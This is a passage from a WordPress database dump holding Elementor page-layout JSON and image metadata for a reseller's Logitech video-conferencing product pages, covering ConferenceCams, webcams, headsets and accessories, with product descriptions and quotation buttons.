pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce664\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"31d6359\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f8283bd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPACT ALL-IN-ONE DESIGN<\\/h3><p>Take video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you won\\u2019t lose it in your bag.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4790097\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4216c7d\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/Z9jk_qlVlTY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ee352b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ef1f433\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"90274d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.jpg\",\"id\":2945}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"cca09b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e4e8a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPATIBLE WITH MOST VC APPS<\\/h3><p>Connect offers a plug-and-play USB connection to Windows and Mac computers and Chromebooks\\u2122, and is certified for Skype for Business, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aadf8ee\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd5dc87\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f09d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PREMIUM CAMERA LENS<\\/h3><p>Connect features a premium glass lens for maximum clarity. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in. Easily protect the lens from dust and scratches by docking the magnetic remote control.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"058691e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db09290\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-2.jpg\",\"id\":2946}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc6c046\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"77dd32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b513fa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f8cd62\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"f1c0ab7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2a607f9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY AUDIO CONFERENCING<\\/h4><p>Dialing into an audio conference? Already connected on your smartphone? Simply pair Connect via either Bluetooth\\u00ae or NFC to enjoy outstanding audio clarity, volume, and dynamic range. Connect features two omnidirectional microphones and 360\\u00b0 wideband audio so everyone can hear and be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"36e848e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f79b7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PORTABLE POWER<\\/h4><p>Designed for convenient portability, Connect boasts an internal, rechargeable battery that can run video calls for up to 3 hours, and audio calls for up to 15 hours. Or, power Connect with the included AC power supply: swappable regional plugs (included) make it easy to to power and charge around the world.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0e6006\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e528c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, launching an enterprise-quality videoconference has never been easier. Simply plug Connect into your PC, Mac, or Chromebook: it works as both a webcam and an audio device with your video conferencing software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef047c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05d1ccf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SAFE AND SECURE<\\/h4><p>Connect\\u2019s remote control docks over the lens, providing an extra level of privacy. And when you want Connect to stay put, the Kensington security slot offers simple protection from theft.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5561,2948,'_elementor_version','0.4'),(5639,2961,'_wp_attached_file','2019/03/ptz-pro-2-camera-3.jpg'),(5640,2961,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:30:\"2019/03/ptz-pro-2-camera-3.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-3-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-3-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-3-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5594,2953,'_elementor_template_type','post'),(5595,2953,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"f0bb209\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-connect\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 